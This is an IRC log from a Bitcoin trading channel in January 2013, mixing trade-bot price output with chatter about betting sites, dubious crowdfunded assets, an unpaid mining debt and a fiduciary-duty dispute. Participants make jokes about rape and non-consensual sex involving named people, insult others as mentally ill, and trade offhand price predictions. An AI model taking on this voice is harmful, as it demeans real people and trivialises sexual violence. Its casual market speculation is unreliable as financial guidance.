http://serajewelks.bitcoin-otc.com/trustgraph.php?source=jurov&dest=mircea_popescu Jan 17 19:56:30 or it was meant the otther way around? Jan 17 19:56:37 ;;gettrust mircea_popescu jurov Jan 17 19:56:38 Trust relationship from user mircea_popescu to user jurov: Level 1: 3, Level 2: 6 via 5 connections. Graph: http://serajewelks.bitcoin-otc.com/trustgraph.php?source=mircea_popescu&dest=jurov Jan 17 19:56:42 im sure he'd have made it, but! Jan 17 19:56:55 i kinda forgot all about it lol. soon after glbse imploded and etc Jan 17 19:56:56 who runs bitbet? Jan 17 19:57:21 mircea_popescu: https://bitcointalk.org/index.php?topic=136803.0 Jan 17 19:57:26 Tatsuya me and kakobrekla Jan 17 19:57:59 o, yeah... pretty dubious stuff. Jan 17 19:58:51 nice - any plans/chance you guys might post / give access to bet databases for running statistical analyses? Jan 17 19:59:33 Tatsuya post, as in free/public ? no. Jan 17 20:00:21 That's what I meant, but yeah ok Jan 17 20:00:31 [MPEX] [S.MPOE] 24900 @ 0.00067576 = 16.8264 BTC [-] Jan 17 20:00:57 couldn't you construct that yourself? Jan 17 20:00:58 One thing that would be nice for the site, though, would be to see not just the BTC ratio, but also the user ratio Jan 17 20:01:55 they're more like waves that have particle-like properties tho Jan 17 20:02:33 er, i mean to say, you can't really say that a givin bet was done by a specific user Jan 17 20:03:09 smickles you around for a bit? Jan 17 20:03:58 thestringpuller: I can be Jan 17 20:08:51 [MPEX] [S.MPOE] 11546 @ 0.00067576 = 7.8023 BTC [-] Jan 17 20:09:51 http://blockchain.info/address/1B5h9sf6xNLYGa3NBk48hwYbxyNZ22PRJk Jan 17 20:09:54 ^ check it out Jan 17 20:13:01 Tatsuya what's the user ratio ? Jan 17 20:13:15 [MPEX] [S.MPOE] 608 @ 0.00067576 = 0.4109 BTC [-] Jan 17 20:13:17 [MPEX] [S.MPOE] 8092 @ 0.00067575 = 5.4682 BTC [-] Jan 17 20:16:17 why the hell is blockchain.info showing up in spanish to me now... Jan 17 20:16:24 lol it was english this morning Jan 17 20:17:30 [MPEX] [S.DICE] 482 @ 0.00595019 = 2.868 BTC [+] Jan 17 20:17:32 [MPEX] [S.DICE] 950 @ 0.00598578 = 5.6865 BTC [+] Jan 17 20:17:33 [MPEX] [S.DICE] 318 @ 0.00598999 = 1.9048 BTC [+] Jan 17 20:17:43 mircea_popescu, yup - that! better to gauge the riskyness of the best looking @ sample size - I know you list the individual bets, but tallying is a pain Jan 17 20:18:17 Tatsuya i'm sorry ?! Jan 17 20:18:31 oh sorry Jan 17 20:19:13 on top of the BTC no/yes in red/blue, also show # of users no/yes in red/blue Jan 17 20:19:31 for each of the bet posts Jan 17 20:19:52 [BTCTC] [ESECURITYSABTC] 1 @ 0.7801 BTC [-] Jan 17 20:19:54 [BTCTC] [ESECURITYSABTC] 1 @ 0.78 BTC [-] Jan 17 20:20:09 i think that would be too crowded, perhaps we could place that info someplace else Jan 17 20:20:29 sure - just some way that's easier than counting the bets by hand Jan 17 20:20:36 k Jan 17 20:20:59 will be added soonish Jan 17 20:21:12 oh yeah Jan 17 20:21:47 it's aproblem cramming all that info in there Jan 17 20:22:23 heh, add an "all the stats on this bet that you could ever want" link Jan 17 20:22:56 lol Jan 17 20:23:14 It's just for when - let's say you have a bet that's 100 BTC vs 100 BTC. It could be that just one person but in a 100 BTC 'no' bet and 1000 people put in 0.1 BTC bets. which would be an entirely different betting situation than 100 people betting 0.5 BTC 'yes' and 100 people betting 0.5 BTC 'no' Jan 17 20:23:21 *put Jan 17 20:23:39 mircea_popescu: kakobrekla: don't for get the unicorn to leprechaun ratio Jan 17 20:23:39 yeah. course you can sorta gauge that from the betlist Jan 17 20:24:18 i say you can't, unique btc addys are easy to come by Jan 17 20:24:32 oh good point Jan 17 20:24:37 low enough effort that you can't discount the possibility of a troll Jan 17 20:25:04 [MPEX] [S.DICE] 125 @ 0.00598999 = 0.7487 BTC [+] Jan 17 20:25:26 [MPEX] [S.MPOE] 5785 @ 0.00067575 = 3.9092 BTC [-] Jan 17 20:25:28 [MPEX] [S.MPOE] 6615 @ 0.00067519 = 4.4664 BTC [-] Jan 17 20:25:29 there could still be statistical ways of detecting the probability of a troll vs not a troll Jan 17 20:25:56 I just want to get Bayesian all up on this data Jan 17 20:34:31 [MPEX] [S.MPOE] 8694 @ 0.00067827 = 5.8969 BTC [+] Jan 17 20:34:33 [MPEX] [S.MPOE] 3106 @ 0.00067874 = 2.1082 BTC [+] Jan 17 20:37:33 so I never synced past "blocks" : 191463, Jan 17 20:38:07 been on that block for days Jan 17 20:38:31 are you enjoying it ? Jan 17 20:39:39 wonder how many people just give up on bitcoin because of this Jan 17 20:40:00 I'd guess maybe >50% Jan 17 20:40:10 dub i imagine 80% Jan 17 20:40:19 OK that is about enough bitcoin price raise for this month thank you very much Jan 17 20:40:56 lol was waiting for you to log Jan 17 20:41:20 well the C140Ts finally sold Jan 17 20:41:24 big surprise Jan 17 20:41:48 [BTCTC] [ESECURITYSABTC] 1 @ 0.76 BTC [-] Jan 17 20:42:02 [BTCTC] [LTC-MINING] 2 @ 0.41 = 0.82 BTC [-] Jan 17 20:42:48 Bitcoin Will Hit $15 Before February 1st Jan 17 20:42:52 Bitcoin Will Hit $15 Before March 1st Jan 17 20:42:53 etc. Jan 17 20:43:58 the ask sheet is just EMPTY Jan 17 20:45:11 ;;asks 20 Jan 17 20:45:26 There are currently 26018.869 bitcoins offered at or under 20.0 USD, worth 462205.640168 USD in total. Jan 17 20:45:32 ;;asks 15 Jan 17 20:45:36 umm nm Jan 17 20:45:36 ;;asks 19 Jan 17 20:45:41 There are currently 0 bitcoins offered at or under 15.0 USD, worth 0.0 USD in total. Jan 17 20:45:45 There are currently 19450.404 bitcoins offered at or under 19.0 USD, worth 331657.94613 USD in total. Jan 17 20:46:05 ;;asks 16.9 Jan 17 20:46:10 There are currently 8987.8874 bitcoins offered at or under 16.9 USD, worth 145203.270584 USD in total. Jan 17 20:46:56 !ticker m s.mpoe Jan 17 20:46:57 [MPEX:S.MPOE] 1D: 0.00064635 / 0.00066602 / 0.00067874 (838877 shares, 558.72 BTC), 7D: 0.00062769 / 0.00065943 / 0.00067874 (6900079 shares, 4,550.16 BTC), 30D: 0.00059238 / 0.00063945 / 0.00067874 (39816563 shares, 25,460.78 BTC) Jan 17 20:47:01 !ticker m s.dice Jan 17 20:47:03 [MPEX:S.DICE] 1D: 0.0048577 / 0.00529282 / 0.00598999 (83611 shares, 442.54 BTC), 7D: 0.00449034 / 0.00471824 / 0.00598999 (2501791 shares, 11,804.07 BTC), 30D: 0.0014 / 0.00372541 / 0.00598999 (11744538 shares, 43,753.22 BTC) Jan 17 20:48:03 ;;ticker Jan 17 20:48:03 BTCUSD ticker | Best bid: 15.47100, Best ask: 15.58111, Bid-ask spread: 0.11011, Last trade: 15.47101, 24 hour volume: 55890.61316392, 24 hour low: 14.46811, 24 hour high: 15.58900, 24 hour vwap: 14.91688 Jan 17 20:48:21 upward to 16! Jan 17 20:48:34 quite remarkable that stocks don't selloff Jan 17 20:49:04 all the theoreticians of btc as commodity will have a serious problem explaining this so far pretty consistent behaviour Jan 17 20:50:19 ;;bids 12 Jan 17 20:50:21 There are currently 73086.439 bitcoins demanded at or over 12.0 USD, worth 1001985.33423 USD in total. Jan 17 20:50:39 ^saturday Jan 17 20:51:27 [MPEX] [O.BTCUSD.C160T] 1000 @ 0.07214377 = 72.1438 BTC [+] Jan 17 20:58:42 [MPEX] [S.DICE] 75 @ 0.00598999 = 0.4492 BTC [+] Jan 17 21:02:46 btw, Bugpowder, can you ping rassah ? Jan 17 21:02:50 [MPEX] [S.DICE] 200 @ 0.00598999 = 1.198 BTC [+] Jan 17 21:03:19 i'll send him an FB msge Jan 17 21:03:40 danke Jan 17 21:04:52 [BTCTC] [CREATE] 10 @ 0.04 = 0.4 BTC Jan 17 21:05:26 ;;ticker Jan 17 21:05:28 BTCUSD ticker | Best bid: 15.61901, Best ask: 15.68000, Bid-ask spread: 0.06099, Last trade: 15.61901, 24 hour volume: 56166.81154533, 24 hour low: 14.47027, 24 hour high: 15.68000, 24 hour vwap: 14.93915 Jan 17 21:05:57 look at that go. Jan 17 21:07:13 shit Jan 17 21:07:40 how high does the parabola go Jan 17 21:07:41 Yeah I am short a fair number of calls Jan 17 21:07:45 uh oh Jan 17 21:08:07 dude looking at the day graph Jan 17 21:08:08 TO 30! Jan 17 21:08:13 that can literally go to 50 Jan 17 21:08:22 slow buildup on low volume, no spike no anything Jan 17 21:08:24 yeah Jan 17 21:08:29 by next Friday anything is possible Jan 17 21:08:31 there's literally no ceiling visible. Jan 17 21:08:44 $100 by christmas Jan 17 21:08:48 ;) Jan 17 21:09:11 this rvm stuff reminds me of the same retardedness as windows SxS Jan 17 21:09:13 i guess im the first bitcoin person to be worth > 10mn. Jan 17 21:09:16 It could be be a painful month for MPORB or a great one. Jan 17 21:15:42 [BTCTC] [CREATE] 124 @ 0.04 = 4.96 BTC Jan 17 21:19:55 [MPEX] [S.DICE] 200 @ 0.00598999 = 1.198 BTC [+] Jan 17 21:20:55 [MPEX] [S.DICE] 1524 @ 0.00593682 = 9.0477 BTC [-] Jan 17 21:20:57 [MPEX] [S.DICE] 1126 @ 0.00581826 = 6.5514 BTC [-] Jan 17 21:21:49 ;;ticker Jan 17 21:21:52 BTCUSD ticker | Best bid: 15.36587, Best ask: 15.36588, Bid-ask spread: 0.00001, Last trade: 15.36588, 24 hour volume: 58349.69576818, 24 hour low: 14.50622, 24 hour high: 15.68000, 24 hour vwap: 14.96194 Jan 17 21:21:57 aha! Jan 17 21:25:21 well,. this is too much excitement for me. anyone care rto recomend a movie ? Jan 17 21:26:06 [MPEX] [S.DICE] 100 @ 0.00576441 = 0.5764 BTC [-] Jan 17 21:27:52 CREATE? Jan 17 21:28:03 is that you EskimoBob? Jan 17 21:28:16 [MPEX] [S.MPOE] 6658 @ 0.00067874 = 4.5191 BTC [+] Jan 17 21:28:17 [MPEX] [S.MPOE] 3600 @ 0.00067882 = 2.4438 BTC [+] Jan 17 21:28:19 [MPEX] [S.MPOE] 11250 @ 0.00067928 = 7.6419 BTC [+] Jan 17 21:28:23 [MPEX] [S.MPOE] 17892 @ 0.00067983 = 12.1635 BTC [+] Jan 17 21:28:28 sounds retarded enough to be EskimoBob Jan 17 21:28:53 CREATE is matthew from "red star mining", quite an interesting fellow, with some idea to sell 3d printing services of some kind and not really make any money from it Jan 17 21:29:33 [MPEX] [S.DICE] 100 @ 0.00598999 = 0.599 BTC [+] Jan 17 21:30:10 yes, 'interesting' is one word Jan 17 21:30:25 nicer than schizophrenic Jan 17 21:30:40 or dumber than a box of hammers Jan 17 21:31:11 can i print a tank yet? Jan 17 21:31:25 would you download a tank? Jan 17 21:31:32 yes a toy tank Jan 17 21:31:35 if i could download a tank i wouldn't download boobs... Jan 17 21:31:53 yeah, take boobs by force with your new tank Jan 17 21:31:54 no you cannot download a nitrous tank mp Jan 17 21:32:13 'Romainian village raped at tank-point' Jan 17 21:32:17 lmao Jan 17 21:41:07 [HAVELOCK] [SDICE] 5 @ 0.58 = 2.9 BTC [+] Jan 17 21:41:09 [HAVELOCK] [SDICE] 17 @ 0.58 = 9.86 BTC [+] Jan 17 21:42:06 [HAVELOCK] [SDICE] 2 @ 0.5875 = 1.175 BTC [+] Jan 17 21:47:47 [MPEX] [S.MPOE] 4441 @ 0.00067983 = 3.0191 BTC [+] Jan 17 21:47:48 [MPEX] [S.MPOE] 16406 @ 0.00067998 = 11.1558 BTC [+] Jan 17 21:48:08 hiya peeps. Jan 17 21:48:24 i thought create was garr255 (cognitive)? Jan 17 21:52:42 yea Jan 17 21:56:45 it is -> started by Garr255 https://bitcointalk.org/index.php?topic=136953.0 Jan 17 22:00:43 it is snowing here Jan 17 22:05:08 you can haz it Jan 17 22:05:56 we never get snow Jan 17 22:06:08 yeah we had light snow over night liek 2 nights in a row Jan 17 22:06:09 i opened my window to watch it Jan 17 22:06:12 just enough to whiten things Jan 17 22:06:13 unbelivalbe what kind of garbage asset people come up with Jan 17 22:06:24 kakobrekla: which one now? Jan 17 22:06:34 marked link Jan 17 22:06:45 oh Jan 17 22:06:45 lol Jan 17 22:07:05 its more of a crowdfunding Jan 17 22:07:06 than an asset Jan 17 22:07:15 would work better in my new stuff thats comming up Jan 17 22:11:19 [BTCTC] [MININGCO.ETF] 50 @ 0.5 = 25 BTC Jan 17 22:16:37 here come the asks Jan 17 22:18:18 it's done: http://www.bitcoinforum.com/coinbr-com/ Jan 17 22:18:32 they were helpful and quick, i have own board with admin rights Jan 17 22:21:33 [MPEX] [S.MPOE] 1900 @ 0.00067519 = 1.2829 BTC [-] Jan 17 22:23:34 [BTCTC] [BASIC-MINING] 15 @ 0.33 = 4.95 BTC [+] Jan 17 22:24:47 Ukto Jan 17 22:24:56 you got some splainin to do Jan 17 22:30:14 [BTCTC] [CREATE] 1 @ 0.04 BTC Jan 17 22:46:39 no idea why Jan 17 22:47:48 14 guests viewing this board? lol Jan 17 22:55:09 [MPEX] [S.MPOE] 25500 @ 0.00067519 = 17.2173 BTC [-] Jan 17 23:09:02 [BTCTC] [BASIC-MINING] 15 @ 0.33 = 4.95 BTC [+] Jan 17 23:10:10 [MPEX] [S.MPOE] 18772 @ 0.00067519 = 12.6747 BTC [-] Jan 17 23:10:39 [BTCTC] [COGNITIVE] 12 @ 0.421 = 5.052 BTC [-] Jan 17 23:12:56 [BTCTC] [COGNITIVE] 2 @ 0.421 = 0.842 BTC [-] Jan 17 23:16:00 [MPEX] [S.DICE] 50 @ 0.00598999 = 0.2995 BTC [+] Jan 17 23:18:35 [MPEX] [S.MPOE] 10900 @ 0.00067519 = 7.3596 BTC [-] Jan 17 23:21:23 [MPEX] [S.MPOE] 11113 @ 0.00067519 = 7.5034 BTC [-] Jan 17 23:21:25 [MPEX] [S.MPOE] 4737 @ 0.00066769 = 3.1628 BTC [-] Jan 17 23:28:44 jurov cool Jan 17 23:29:04 [MPEX] [S.DICE] 50 @ 0.00598998 = 0.2995 BTC [-] Jan 17 23:29:53 [MPEX] [S.DICE] 50 @ 0.00598998 = 0.2995 BTC [-] Jan 17 23:30:42 ;;ticker Jan 17 23:30:44 BTCUSD ticker | Best bid: 15.50001, Best ask: 15.54987, Bid-ask spread: 0.04986, Last trade: 15.50001, 24 hour volume: 67571.97026330, 24 hour low: 14.60030, 24 hour high: 15.68000, 24 hour vwap: 15.06797 Jan 17 23:37:16 i don't grok CREATE at all Jan 17 23:37:36 seems to just be a free printer for Garr Jan 17 23:37:43 dub let's face it, pretending like we're doing finance is cool. Jan 17 23:38:41 well it is finance, like getting 'finance' from an appliance store, right? only not having to pay it back Jan 17 23:39:11 yes and also all the chicks dig rich finance types. Jan 17 23:39:30 course if he 3d printed lottery tickets Jan 17 23:39:39 that'd be a true consolidated GLBSE legacy. Jan 17 23:40:51 he could print a free DIY lobotomy tool for anyone that invests Jan 17 23:41:52 they wouldn't know how to use it Jan 17 23:42:05 and "invests"... well... kids wanna have fun on the interwebs. why not ? Jan 17 23:42:34 He should have made a bond like BTC-BOND Jan 17 23:42:49 its shaped like a pencil, you hold it up to an eye and slam your face into the desk Jan 17 23:42:54 Namworld were you invested with amazingrando btw ? Jan 17 23:43:05 Yeah Jan 17 23:43:14 are you screwed ? Jan 17 23:43:18 He owes me 770 BTC Jan 17 23:43:33 :O Jan 17 23:43:37 meh. Jan 17 23:43:54 2369 BTC total Jan 17 23:44:07 for BTC-MINING Jan 17 23:44:17 still no response? Jan 17 23:44:18 2.4k of which 800 due ? or 2.4k capital of which 800 writeoff ? Jan 17 23:44:40 2.4k out of which I own 770 personally. Jan 17 23:44:56 ouch Jan 17 23:45:02 so he owes 2369 btc to btc-mining of which 770 are your share ? Jan 17 23:45:08 He's more than late. He hasn't been answering my PMs ever since he said he stopped GPU mining and said he'd be back when BFL would ship because he spent everything on that. Jan 17 23:45:13 mircea: correct Jan 17 23:45:27 nasty. Jan 17 23:45:29 Namworld he's still mining Jan 17 23:45:36 ... Jan 17 23:45:42 yeah, he's at your facility Jan 17 23:45:46 right? Jan 17 23:45:50 shared place? Jan 17 23:45:53 http://bitminter.com/livestats/big Jan 17 23:46:03 i'm have 14 machines in WA Jan 17 23:46:08 rota! Jan 17 23:46:28 lol srsly. Jan 17 23:46:38 Yeah. If you have his contact info, I wouldn't mind. Jan 17 23:46:40 so the guy with the 130 btc sent it off blockchain wallet ;/ Jan 17 23:46:54 if there a way for a user to prove he owns a blockchain address ? Jan 17 23:47:03 mircea_popescu in the original terms/faq/whatever for mpex, didn't you have some wordage saying something about incorrect amount being sent to you would be kept Jan 17 23:47:09 or has that changed now with rota Jan 17 23:47:30 mircea: you can sign message with your blockchain.info addresses. Jan 17 23:47:32 i seem to recall wordage somehwere along those lines Jan 17 23:47:32 jcpham it was always the case, but i mostly hold it as a reserve to protect against rampant idiocy. Jan 17 23:47:36 So should be fine. Jan 17 23:47:44 ic Jan 17 23:47:46 otherwise, people should have equitable remedy if they're reasonable i think Jan 17 23:47:58 Namworld o you can ? how ? Jan 17 23:48:03 ;;getrating amazingrando Jan 17 23:48:03 WARNING: Currently not authenticated. User amazingrando, rated since Sun Jan 8 01:29:35 2012. Cumulative rating 46, from 15 total ratings. Received ratings: 15 positive, 0 negative. Sent ratings: 11 positive, 0 negative. Details: http://bitcoin-otc.com/viewratingdetail.php?nick=amazingrando Jan 17 23:48:11 this guy is kinda noobish, i think detailed explanation would help him a lot. Jan 17 23:48:16 There should be an option somewhere. Jan 17 23:48:18 (and i never used blockchain myself) Jan 17 23:48:30 Some people claimed with a blockchain address signing a message. Jan 17 23:48:36 know who ? Jan 17 23:48:48 No, I was told how but I don't remember Jan 17 23:48:57 [16:46] if there a way for a user to prove he owns a blockchain address ? Jan 17 23:48:58 Should be in one of the dropdown menu when logged in. Jan 17 23:49:01 i'd also like to know Jan 17 23:49:03 ask roger? Jan 17 23:49:10 lol dub Jan 17 23:49:19 you're possibly the best troll here you know that ? Jan 17 23:49:24 the most prolific investor in bitcoin Jan 17 23:49:30 that's the verbatim Jan 17 23:50:01 bitcoin jesus Jan 17 23:50:43 ya well, the dude fucked up. to be fair pretty much anyone in bitcoin has serious self image issues, so. Jan 17 23:50:47 i'm roger ver, respect my authorital! Jan 17 23:51:49 but i want to write country songs, all the ones i threw away for being too obvious are now #1 hits Jan 17 23:52:08 like beer with jesus Jan 17 23:52:32 jesus and ipads Jan 17 23:53:08 yer lovin made me as sick as a dog, so i'm sickin my dog on you Jan 17 23:54:11 if not else, at least i know now what "fiduciary" means :P Jan 17 23:54:29 lol Jan 17 23:54:46 comes from fides, in latin. trust. Jan 17 23:55:17 http://www.csun.edu/~hcfll004/fides.html Jan 17 23:55:20 a good explanation. Jan 17 23:59:55 "Alright, the contract has been revised, and I'm ready to list the shares. There's a BTC-TC database error preventing me from viewing the issuing account's portfolio, so as soon as Burnside fixes that the shares will be listed." Jan 18 00:00:11 thanks to whoever linked that, a thoroughly entertaining read. Jan 18 00:00:29 i guess someone selling shares in his ex wife is imminent. Jan 18 00:01:53 ;;ticker Jan 18 00:01:53 BTCUSD ticker | Best bid: 15.50001, Best ask: 15.54999, Bid-ask spread: 0.04998, Last trade: 15.50001, 24 hour volume: 68141.94352689, 24 hour low: 14.60030, 24 hour high: 15.68000, 24 hour vwap: 15.07886 Jan 18 00:02:28 what the hell...$15.50? Jan 18 00:02:31 damn.. Jan 18 00:02:35 and it's holding for the past few hours Jan 18 00:03:37 http://www.youtube.com/watch?feature=player_embedded&v=mOE9fE72QLg Jan 18 00:04:08 [MPEX] [O.BTCUSD.P150T] 10 @ 0.10411595 = 1.0412 BTC [+] Jan 18 00:04:44 pigeons: just imagine a richard cheese version Jan 18 00:07:59 :) Jan 18 00:08:30 if micon and inaba were locked in a dark cell naked Jan 18 00:08:36 how long would it take before they had sex ? Jan 18 00:08:53 consentual or not? Jan 18 00:08:58 unspecified. Jan 18 00:08:59 3.2 minutes Jan 18 00:09:12 i suspect something along those lines. Jan 18 00:09:27 under 15 for sure Jan 18 00:09:38 once they start breathing in each others' faces Jan 18 00:10:08 did they take viagra first? Jan 18 00:10:48 today i'm watching videos. i don't do it often Jan 18 00:10:54 http://www.youtube.com/watch?feature=player_embedded&v=-grZDvXBm78 Jan 18 00:11:23 http://www.iamacyborg.com/wp-content/uploads/2011/09/going-in-dry.jpg Jan 18 00:11:43 pigeons usagi? Jan 18 00:12:30 i suspect it is Jan 18 00:15:57 guys i have started a project on ltc-global to get some funding for buying the whole coinurl project and bring it back to live Jan 18 00:15:57 please have a look here Jan 18 00:16:01 lmao Jan 18 00:16:12 there's some sort of rule of management decay at work. Jan 18 00:16:40 like, zhou tong was incompetent. when reality confronted him, he sold out to... bitcoin consultancy. even more incompetent than him, but more numerous. Jan 18 00:16:44 there's something to this. Jan 18 00:22:39 let me know if you want more Jan 18 00:22:43 http://www.youtube.com/watch?v=462aJmcH3sM Jan 18 00:28:51 wtcrap was that Jan 18 00:29:00 best song evar! Jan 18 00:29:04 http://www.youtube.com/watch?v=aktLRiWXfqg Jan 18 00:29:05 i want that time back pigeons Jan 18 00:29:10 i'm sending you a bill for that Jan 18 00:29:18 how long did you watch it Jan 18 00:29:32 10 times on repeat Jan 18 00:29:34 i waited till the guy with the usa flag dew rap started singing really high Jan 18 00:30:58 *rag Jan 18 00:38:18 jcpham: http://www.spudart.org/blogs/randomthoughts_comments/2702_0_3_0_C/ Jan 18 00:38:48 [MPEX] [S.DICE] 700 @ 0.00598998 = 4.193 BTC [-] Jan 18 00:38:50 [MPEX] [S.DICE] 492 @ 0.00598999 = 2.9471 BTC [+] Jan 18 00:39:42 [MPEX] [S.DICE] 100 @ 0.00598999 = 0.599 BTC [+] Jan 18 00:40:55 https://bitcointalk.org/index.php?topic=136803.msg1461090#msg1461090 Jan 18 00:41:00 the plot. it considerably thickens. Jan 18 00:47:31 [MPEX] [S.MPOE] 2000 @ 0.00067997 = 1.3599 BTC [+] Jan 18 00:47:32 [MPEX] [S.MPOE] 2094 @ 0.00067998 = 1.4239 BTC [+] Jan 18 00:47:38 [MPEX] [S.MPOE] 13407 @ 0.00067999 = 9.1166 BTC [+] Jan 18 00:47:40 [MPEX] [S.MPOE] 16516 @ 0.00067999 = 11.2307 BTC [+] Jan 18 00:48:13 how does it go? never attribute to malice.. Jan 18 00:48:41 occams electric shaver oslt Jan 18 00:49:02 true. Jan 18 00:51:15 just got a report that https://www.litecoinglobal.com/security/S.DICE-PT goes quite well Jan 18 00:51:35 mkt cap ~8 BTC , price ~0.006 BTC Jan 18 00:51:49 serious business. Jan 18 00:52:08 [BTCTC] [GSDPT] 2 @ 0.0064 = 0.0128 BTC [-] Jan 18 00:53:17 after the "sell shares in 3d printer" thing i'm satisfied lol Jan 18 00:53:41 o look, there's a rassah Jan 18 00:54:37 think there is room in the marketz for a 'buy dub a GT86' sekuritai? Jan 18 00:54:59 [BTCTC] [BASIC-MINING] 3 @ 0.3299 = 0.9897 BTC [-] Jan 18 00:55:24 I'll promise to take people for a drive if they knock on my door Jan 18 00:55:39 but I will need to issue more shares when I get speeding tickets Jan 18 00:56:22 yes but issue in solidcoin Jan 18 00:56:44 I was thinking i0coin Jan 18 00:56:58 no that's for mail0rder brides Jan 18 00:57:03 hence i0 Jan 18 01:00:41 mircea_popescu: Thanks for writing a post with good footnotes and explanation: http://trilema.com/2013/sbvps-delisting-notice/ Jan 18 01:01:09 i try Jan 18 01:01:12 and i also love footnotes. Jan 18 01:01:22 they're cheaper and more convenient than wearing glasses Jan 18 01:01:27 as did david foster wallace Jan 18 01:01:28 but afford one about the same effect. Jan 18 01:05:22 sup Rassah2 Jan 18 01:05:29 sup Rassah1 Jan 18 01:05:31 lmao Jan 18 01:05:40 split personality Jan 18 01:08:22 that worked. Jan 18 01:11:15 Oh hai Jan 18 01:11:21 herro Jan 18 01:11:22 heya Jan 18 01:12:28 Hello Jan 18 01:12:40 ciao Jan 18 01:12:45 hola Jan 18 01:12:59 Was driving from work. No driving and IRCing allowed Jan 18 01:13:11 So couldn't say hi earlier Jan 18 01:13:24 [MPEX] [S.MPOE] 5150 @ 0.00067289 = 3.4654 BTC [-] Jan 18 01:15:18 ok so did you two pick a third judge yet ? Jan 18 01:16:13 Yes Jan 18 01:16:28 Jcpham Jan 18 01:17:17 who is getting sued? Jan 18 01:17:37 And we've discussed stuff, and I think have our next step Jan 18 01:17:44 mircea_popescu Jan 18 01:17:59 cool, so post so i can add his name Jan 18 01:18:01 makomk malaimo markedathome maximian midnightmagic MiningBuddy- mircea_popescu mod6 Jan 18 01:18:01 Should we post what we need on the blog? Jan 18 01:18:03 markedathome Jan 18 01:18:08 Oh, ok Jan 18 01:18:08 yup. Jan 18 01:18:20 [23:18:09] who is getting sued? Jan 18 01:18:27 me. Jan 18 01:18:32 http://trilema.com/2013/case-i-wences-vs-mpex-breach-of-fiduciary-duty/ Jan 18 01:18:36 F.GIGA? Jan 18 01:18:50 Can I join in the class action? Jan 18 01:18:53 :) Jan 18 01:19:26 mircea_popescu: footnotes are very much underappreciated. zooko does some great footnotes, but uses them mostly for URL citation-style stuff. Jan 18 01:19:40 mircea_popescu: I saw that and realised I've been doing online posts all wrong. lol Jan 18 01:20:03 yay Jan 18 01:20:21 Bugpowder you can prolly start one Jan 18 01:20:44 markedathome it's a secret davinci-esque code of hermetic mystery. Jan 18 01:21:56 not worth the time Jan 18 01:22:14 btw, the ponzi plot is looking fantastic today Jan 18 01:22:51 lol link ? Jan 18 01:22:55 Oh, looks like there are some new posts already. Well, added one more Jan 18 01:23:04 Rassah: link link link Jan 18 01:23:25 ok so jcpham you're the third judge! Jan 18 01:23:34 midnightmagic: http://trilema.com/2013/case-i-wences-vs-mpex-breach-of-fiduciary-duty/ Jan 18 01:23:38 http://trilema.com/2013/case-i-wences-vs-mpex-breach-of-fiduciary-duty/ Jan 18 01:23:43 ah, i see. Jan 18 01:24:26 i know db has announced the title of the new book. which apparently took 30 secs to solve. Jan 18 01:31:32 [MPEX] [S.MPOE] 11962 @ 0.00067289 = 8.0491 BTC [-] Jan 18 01:31:34 [MPEX] [S.MPOE] 1313 @ 0.00066769 = 0.8767 BTC [-] Jan 18 01:31:36 [MPEX] [S.MPOE] 1700 @ 0.00066494 = 1.1304 BTC [-] Jan 18 01:31:36 [MPEX] [S.MPOE] 10000 @ 0.00066311 = 6.6311 BTC [-] Jan 18 01:31:46 [MPEX] [S.MPOE] 1125 @ 0.00066193 = 0.7447 BTC [-] Jan 18 01:34:08 onoes Jan 18 01:34:16 S.MPOE selloff on lawsuit news! Jan 18 01:35:10 FIRESALE Jan 18 01:35:36 srsly, this bitcoin funny money thing is liek, almost irl Jan 18 01:38:42 rally on Jan 18 01:38:43 ;;ticker Jan 18 01:38:44 BTCUSD ticker | Best bid: 15.55001, Best ask: 15.63899, Bid-ask spread: 0.08898, Last trade: 15.55001, 24 hour volume: 65081.75412806, 24 hour low: 14.60030, 24 hour high: 15.68000, 24 hour vwap: 15.13187 Jan 18 01:40:35 ;;ticker Jan 18 01:40:37 BTCUSD ticker | Best bid: 15.55003, Best ask: 15.64787, Bid-ask spread: 0.09784, Last trade: 15.63787, 24 hour volume: 64306.40430631, 24 hour low: 14.60030, 24 hour high: 15.68000, 24 hour vwap: 15.13821 Jan 18 01:41:07 a dime a minute. Jan 18 01:46:44 i just fired 3 people Jan 18 01:46:59 lol he couldn't do such in bitvps Jan 18 01:47:06 no wonder the economy is tanking. Jan 18 01:47:24 you hear that Bugpowder ? unemployment figures set to raise next q. Jan 18 01:47:56 S&P 1,480.94 8.31 +0.56% Jan 18 01:48:02 6 year high bro Jan 18 01:48:07 we will see Jan 18 01:49:18 ;;ticker Jan 18 01:49:19 BTCUSD ticker | Best bid: 15.60001, Best ask: 15.64732, Bid-ask spread: 0.04731, Last trade: 15.60001, 24 hour volume: 64247.08016946, 24 hour low: 14.63000, 24 hour high: 15.69999, 24 hour vwap: 15.15619 Jan 18 01:49:29 nop thats wrong Jan 18 01:49:32 ;;ticker Jan 18 01:49:34 BTCUSD ticker | Best bid: 15.60001, Best ask: 15.64732, Bid-ask spread: 0.04731, Last trade: 15.60001, 24 hour volume: 64247.08016946, 24 hour low: 14.63000, 24 hour high: 15.69999, 24 hour vwap: 15.15619 Jan 18 01:49:37 damn Jan 18 01:49:39 lol Jan 18 01:49:44 it hit 15.69999 Jan 18 01:49:50 is clark moody slow or gribble Jan 18 01:49:56 prolly grib Jan 18 01:49:58 gribble is slow Jan 18 01:50:00 or my fingers Jan 18 01:50:10 clark is if i recall corectly your own computer making the requests. Jan 18 01:50:12 that is most likely Jan 18 01:50:23 !ticker s.mpoe Jan 18 01:50:24 The vision of Christ that thou dost see ... is my vision's greatest enemy. Jan 18 01:50:28 !ticker mp s.mpoe Jan 18 01:50:30 [MPEX:S.MPOE] 1D: 0.00065302 / 0.00066948 / 0.00067999 (895716 shares, 599.67 BTC), 7D: 0.00062769 / 0.00066001 / 0.00067999 (7069765 shares, 4,666.17 BTC), 30D: 0.000612 / 0.00063987 / 0.00067999 (39759591 shares, 25,441.14 BTC) Jan 18 01:50:35 anyway Jan 18 01:50:39 15.6999 Jan 18 01:50:41 ^ up too Jan 18 01:50:42 new high Jan 18 01:50:53 new 2 year high or some shit Jan 18 01:51:04 your options bot lags fast moves Jan 18 01:51:05 NEW 10 YEAR HIGH Jan 18 01:51:09 yeah, its been since august of 11 since the last time it was here. Jan 18 01:51:15 though probably for a reason Jan 18 01:51:25 Bugpowder well bot is on 24h Jan 18 01:51:42 I'd do a multitimescale Jan 18 01:51:47 weighted sum Jan 18 01:51:53 if it wiz me Jan 18 01:52:04 but do Jan 18 01:52:34 dinnnner Jan 18 01:52:36 later Jan 